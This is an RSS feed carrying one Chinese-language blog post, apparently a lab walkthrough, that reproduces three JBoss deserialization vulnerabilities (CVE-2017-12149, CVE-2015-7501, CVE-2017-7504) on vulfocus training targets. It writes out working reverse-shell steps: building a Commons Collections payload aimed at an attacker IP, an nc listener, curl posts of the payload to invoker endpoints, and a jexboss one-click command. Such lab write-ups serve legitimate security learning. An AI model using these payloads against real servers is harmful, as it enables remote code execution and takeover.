<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>Jboss on 静静的安全笔记</title><link>https://ruajingjing.top/tags/jboss/</link><description>Recent content in Jboss on 静静的安全笔记</description><generator>Hugo -- gohugo.io</generator><language>zh-CN</language><lastBuildDate>Thu, 08 Aug 2024 16:13:45 +0000</lastBuildDate><atom:link href="https://ruajingjing.top/tags/jboss/index.xml" rel="self" type="application/rss+xml"/><item><title>Jobss漏洞 CVE-2017-12149 CVE-2015-7501 CVE-2017-7504</title><link>https://ruajingjing.top/post/jobss%E6%BC%8F%E6%B4%9E-cve-2017-12149-cve-2015-7501-cve-2017-7504/</link><pubDate>Thu, 08 Aug 2024 16:13:45 +0000</pubDate><guid>https://ruajingjing.top/post/jobss%E6%BC%8F%E6%B4%9E-cve-2017-12149-cve-2015-7501-cve-2017-7504/</guid><description>&lt;img src="https://ruajingjing.top/" alt="Featured image of post Jobss漏洞 CVE-2017-12149 CVE-2015-7501 CVE-2017-7504" /&gt;&lt;h2 id="jboss-代码执行-cve-2017-12149"&gt;jboss 代码执行 (CVE-2017-12149)
&lt;/h2&gt;&lt;h3 id="影响范围"&gt;影响范围
&lt;/h3&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-txt" data-lang="txt"&gt;&lt;span class="line"&gt;&lt;span class="ln"&gt;1&lt;/span&gt;&lt;span class="cl"&gt;JBoss 5.x/6.x
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="漏洞原理"&gt;漏洞原理
&lt;/h3&gt;&lt;p&gt;在/invoker/readonly路径下，攻击者可以构造序列化代码传入服务器进行反序列化,由于没有对反序列化操作进行任何检测，导致攻击者可以执行任意代码
该漏洞位于JBoss的HttpInvoker组件中的 ReadOnlyAccessFilter 过滤器中，其doFilter方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化，导致攻击者可以通过精心设计的序列化数据来执行任意代码&lt;/p&gt;
&lt;h3 id="漏洞复现"&gt;漏洞复现
&lt;/h3&gt;&lt;p&gt;&lt;img alt="图0" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://newblogimg.oss-cn-beijing.aliyuncs.com/2024/2024070809/2024-07-29-16-41-31.png"&gt;&lt;/p&gt;
&lt;p&gt;启动 &lt;a class="link" href="https://vulfocus.cn/" target="_blank" rel="noopener"
 &gt;https://vulfocus.cn/&lt;/a&gt; 靶场环境&lt;/p&gt;
&lt;p&gt;&lt;img alt="图1" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://newblogimg.oss-cn-beijing.aliyuncs.com/2024/2024070809/2024-07-29-16-42-27.png"&gt;&lt;/p&gt;
&lt;p&gt;访问 /invoker/readonly 如果返回500，说明此页面就可能存在反序列化漏洞。&lt;/p&gt;
&lt;p&gt;&lt;img alt="图2" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://newblogimg.oss-cn-beijing.aliyuncs.com/2024/2024070809/2024-07-29-16-43-12.png"&gt;&lt;/p&gt;
&lt;h4 id="直接用cve工具利用"&gt;直接用CVE工具利用
&lt;/h4&gt;&lt;p&gt;&lt;img alt="图3" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://newblogimg.oss-cn-beijing.aliyuncs.com/2024/2024070809/2024-07-29-16-43-54.png"&gt;&lt;/p&gt;
&lt;p&gt;&lt;img alt="图4" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://newblogimg.oss-cn-beijing.aliyuncs.com/2024/2024070809/2024-07-29-16-47-37.png"&gt;&lt;/p&gt;
&lt;p&gt;靶场 &lt;code&gt;flag-{bmh7cbffb27-ed9a-4c74-8929-0b6df905cc8a}&lt;/code&gt;&lt;/p&gt;
&lt;h4 id="反弹shell的poc"&gt;反弹shell的POC
&lt;/h4&gt;&lt;p&gt;下载工具后进入目录&lt;a class="link" href="http://scan.javasec.cn/java/JavaDeserH2HC.zip" target="_blank" rel="noopener"
 &gt;http://scan.javasec.cn/java/JavaDeserH2HC.zip&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;攻击机下载执行执行生成二进制payload文件：&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span class="line"&gt;&lt;span class="ln"&gt;1&lt;/span&gt;&lt;span class="cl"&gt;javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;修改接收shell的IP和端口：&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span class="line"&gt;&lt;span class="ln"&gt;1&lt;/span&gt;&lt;span class="cl"&gt;java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 攻击机IP:7777
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;img alt="图5" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://newblogimg.oss-cn-beijing.aliyuncs.com/2024/2024070809/2024-07-29-17-18-14.png"&gt;&lt;/p&gt;
&lt;p&gt;不要管报错&lt;/p&gt;
&lt;p&gt;NC开启监听：&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span class="line"&gt;&lt;span class="ln"&gt;1&lt;/span&gt;&lt;span class="cl"&gt;nc -vv -l -p &lt;span class="m"&gt;7777&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;向靶机发起攻击Payload：&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span class="line"&gt;&lt;span class="ln"&gt;1&lt;/span&gt;&lt;span class="cl"&gt;curl http://123.58.224.8:26968/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;img alt="图6" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://newblogimg.oss-cn-beijing.aliyuncs.com/2024/2024070809/2024-07-29-17-22-32.png"&gt;&lt;/p&gt;
&lt;p&gt;反弹成功&lt;/p&gt;
&lt;p&gt;&lt;img alt="图7" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://newblogimg.oss-cn-beijing.aliyuncs.com/2024/2024070809/2024-07-29-17-24-28.png"&gt;&lt;/p&gt;
&lt;p&gt;取得flag&lt;/p&gt;
&lt;h2 id="jboss-jmxinvokerservlet-反序列化漏洞cve-2015-7501"&gt;JBoss JMXInvokerServlet 反序列化漏洞（CVE-2015-7501）
&lt;/h2&gt;&lt;h3 id="影响版本"&gt;影响版本
&lt;/h3&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span class="line"&gt;&lt;span class="ln"&gt; 1&lt;/span&gt;&lt;span class="cl"&gt;Red Hat JBoss A-MQ 6.x版本；
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="ln"&gt; 2&lt;/span&gt;&lt;span class="cl"&gt;BPM Suite &lt;span class="o"&gt;(&lt;/span&gt;BPMS&lt;span class="o"&gt;)&lt;/span&gt; 6.x版本；
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="ln"&gt; 3&lt;/span&gt;&lt;span class="cl"&gt;BRMS 6.x版本和5.x版本；
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="ln"&gt; 4&lt;/span&gt;&lt;span class="cl"&gt;Data Grid &lt;span class="o"&gt;(&lt;/span&gt;JDG&lt;span class="o"&gt;)&lt;/span&gt; 6.x版本；
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="ln"&gt; 5&lt;/span&gt;&lt;span class="cl"&gt;Data Virtualization &lt;span class="o"&gt;(&lt;/span&gt;JDV&lt;span class="o"&gt;)&lt;/span&gt; 6.x版本和5.x版本；
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="ln"&gt; 6&lt;/span&gt;&lt;span class="cl"&gt;Enterprise Application Platform 6.x版本，5.x版本和4.3.x版本；
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="ln"&gt; 7&lt;/span&gt;&lt;span class="cl"&gt;Fuse 6.x版本；
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="ln"&gt; 8&lt;/span&gt;&lt;span class="cl"&gt;Fuse Service Works &lt;span class="o"&gt;(&lt;/span&gt;FSW&lt;span class="o"&gt;)&lt;/span&gt; 6.x版本；
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="ln"&gt; 9&lt;/span&gt;&lt;span class="cl"&gt;Operations Network &lt;span class="o"&gt;(&lt;/span&gt;JBoss ON&lt;span class="o"&gt;)&lt;/span&gt; 3.x版本；
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="ln"&gt;10&lt;/span&gt;&lt;span class="cl"&gt;Portal 6.x版本；
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="ln"&gt;11&lt;/span&gt;&lt;span class="cl"&gt;SOA Platform &lt;span class="o"&gt;(&lt;/span&gt;SOA-P&lt;span class="o"&gt;)&lt;/span&gt; 5.x版本；
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="ln"&gt;12&lt;/span&gt;&lt;span class="cl"&gt;Web Server &lt;span class="o"&gt;(&lt;/span&gt;JWS&lt;span class="o"&gt;)&lt;/span&gt; 3.x版本；
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="ln"&gt;13&lt;/span&gt;&lt;span class="cl"&gt;Red Hat OpenShift/xPAAS 3.x版本；
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="ln"&gt;14&lt;/span&gt;&lt;span class="cl"&gt;Red Hat Subscription Asset Manager 1.3版本。
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="漏洞原理1"&gt;漏洞原理1
&lt;/h3&gt;&lt;p&gt;JBoss在 /invoker/JMXInvokerServlet 请求中读取了用户传入的对象，然后我们可以利用 Apache Commons Collections 中的 Gadget 执行任意代码。&lt;/p&gt;
&lt;h3 id="漏洞复现1"&gt;漏洞复现1
&lt;/h3&gt;&lt;p&gt;&lt;img alt="图8" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://newblogimg.oss-cn-beijing.aliyuncs.com/2024/2024070809/2024-07-29-17-31-54.png"&gt;&lt;/p&gt;
&lt;p&gt;如果嫩下载JMXInvokerServlet文件就存在漏洞。&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span class="line"&gt;&lt;span class="ln"&gt;1&lt;/span&gt;&lt;span class="cl"&gt;git clone https://github.com/ianxtianxt/CVE-2015-7501/
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="ln"&gt;2&lt;/span&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;cd&lt;/span&gt; CVE-2015-7501/
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="ln"&gt;3&lt;/span&gt;&lt;span class="cl"&gt;javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="ln"&gt;4&lt;/span&gt;&lt;span class="cl"&gt;java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 攻击机IP:7777
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="ln"&gt;5&lt;/span&gt;&lt;span class="cl"&gt;nc -vv -l -p &lt;span class="m"&gt;7777&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="ln"&gt;6&lt;/span&gt;&lt;span class="cl"&gt;curl http://123.58.224.8:55153/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;img alt="图9" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://newblogimg.oss-cn-beijing.aliyuncs.com/2024/2024070809/2024-07-29-17-38-44.png"&gt;&lt;/p&gt;
&lt;p&gt;&lt;img alt="图10" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://newblogimg.oss-cn-beijing.aliyuncs.com/2024/2024070809/2024-07-29-17-39-25.png"&gt;&lt;/p&gt;
&lt;p&gt;_flag=flag-{bmh30a69994-5535-4de1-b53d-5c36c0d0498e}&lt;/p&gt;
&lt;h3 id="jboss-ejbinvokerservlet-反序列化漏洞"&gt;JBoss EJBInvokerServlet 反序列化漏洞
&lt;/h3&gt;&lt;p&gt;跟CVE-2015-7501利⽤⽅法⼀样，只是路径不⼀样，这个漏洞利⽤路径是&lt;/p&gt;
&lt;p&gt;&lt;code&gt;/invoker/EJBInvokerServlet&lt;/code&gt;&lt;/p&gt;
&lt;h2 id="jbossmqjms-反序列化漏洞cve-2017-7504"&gt;JBossMQJMS 反序列化漏洞（CVE-2017-7504）
&lt;/h2&gt;&lt;h3 id="影响版本2"&gt;影响版本2
&lt;/h3&gt;&lt;p&gt;JBoss &amp;lt;=4.x&lt;/p&gt;
&lt;h3 id="漏洞原理2"&gt;漏洞原理2
&lt;/h3&gt;&lt;p&gt;JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞，远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。&lt;/p&gt;
&lt;h3 id="漏洞复现2"&gt;漏洞复现2
&lt;/h3&gt;&lt;p&gt;访问 &lt;code&gt;/jbossmq-httpil/HTTPServerILServlet&lt;/code&gt; 返回This is the JBossMQ HTTP-IL，说明存在反序列化漏洞。&lt;/p&gt;
&lt;p&gt;&lt;img alt="图13" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://newblogimg.oss-cn-beijing.aliyuncs.com/2024/2024070809/2024-07-29-17-49-58.png"&gt;&lt;/p&gt;
&lt;h4 id="利用工具javadeserh2hc"&gt;利用工具:JavaDeserH2HC
&lt;/h4&gt;&lt;p&gt;&lt;code&gt;https://github.com/joaomatosf/JavaDeserH2HC&lt;/code&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span class="line"&gt;&lt;span class="ln"&gt;1&lt;/span&gt;&lt;span class="cl"&gt;javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="ln"&gt;2&lt;/span&gt;&lt;span class="cl"&gt;java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 攻击机:7777
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="ln"&gt;3&lt;/span&gt;&lt;span class="cl"&gt;nc -vv -l -p &lt;span class="m"&gt;7777&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="ln"&gt;4&lt;/span&gt;&lt;span class="cl"&gt;curl http://123.58.224.8:47973/jbossmq-httpil/HTTPServerILServlet --data-binary @ReverseShellCommonsCollectionsHashMap.ser
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;img alt="图14" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://newblogimg.oss-cn-beijing.aliyuncs.com/2024/2024070809/2024-07-29-17-52-29.png"&gt;&lt;/p&gt;
&lt;p&gt;flag-{bmh93d53260-14f8-4405-91cd-f4221ef65f3f}&lt;/p&gt;
&lt;h4 id="jexboss-工具一键植入"&gt;Jexboss 工具一键植入
&lt;/h4&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span class="line"&gt;&lt;span class="ln"&gt;1&lt;/span&gt;&lt;span class="cl"&gt;python jexboss.py -u http://123.58.224.8:47973/
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;img alt="图11" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://newblogimg.oss-cn-beijing.aliyuncs.com/2024/2024070809/2024-07-29-17-48-15.png"&gt;&lt;/p&gt;
&lt;p&gt;&lt;img alt="图12" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://newblogimg.oss-cn-beijing.aliyuncs.com/2024/2024070809/2024-07-29-17-48-34.png"&gt;&lt;/p&gt;
&lt;h2 id="特殊情况"&gt;特殊情况
&lt;/h2&gt;&lt;p&gt;&lt;img alt="tsqk" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://newblogimg.oss-cn-beijing.aliyuncs.com/2024/2024070809/Snipaste_2024-08-16_13-13-08.png"&gt;&lt;/p&gt;
&lt;p&gt;Windows主机无法反弹shell。&lt;/p&gt;

 &lt;blockquote&gt;
 &lt;p&gt;参考链接&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;a class="link" href="https://mp.weixin.qq.com/s/IVVftRRofmGQaE52m4SAyQ" target="_blank" rel="noopener"
 &gt;https://mp.weixin.qq.com/s/IVVftRRofmGQaE52m4SAyQ&lt;/a&gt;&lt;/li&gt;
&lt;/ol&gt;

 &lt;/blockquote&gt;</description></item></channel></rss>